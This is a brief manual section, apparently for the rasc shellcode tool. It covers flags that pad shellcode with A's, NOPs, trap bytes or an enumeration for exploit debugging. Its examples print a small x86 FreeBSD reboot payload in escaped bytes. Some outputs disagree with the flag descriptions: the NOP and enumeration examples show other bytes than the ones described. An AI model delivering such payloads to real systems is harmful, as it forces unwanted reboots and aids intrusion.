15.2 Paddings

The shellcode can be easily modified to have different prefixes and suffixes to ease the debugging of the exploit development. These flags are:

-A [n]       prefix shellcode with N A's (0x41)
-N [n]       prefix shellcode with N nops (0x90)
-C [n]       suffix shellcode with N traps
-E [n]       prefix with enumeration 01 02 03..

Here there are some examples:

 $ rasc -i x86.freebsd.reboot -e -A 20
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
 \x41\x41\x41\x41\x41\x31\xc0\x50\xb0\x37\xcd\x80"

 $ rasc -i x86.freebsd.reboot -e -N 20
"\x40\x48\x40\x48\x40\x48\x40\x48\x40\x48\x40\x48\x40\x48\x40\x48
 \x40\x48\x40\x48\x41\x31\xc0\x50\xb0\x37\xcd\x80"

 $ rasc -i x86.freebsd.reboot -e -E 20
"\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44
 \x45\x45\x45\x45\x46\x31\xc0\x50\xb0\x37\xcd\x80"

$ rasc -i x86.freebsd.reboot -e -C 20
"\x41\x31\xc0\x50\xb0\x37\xcd\x80\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc
 \xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc"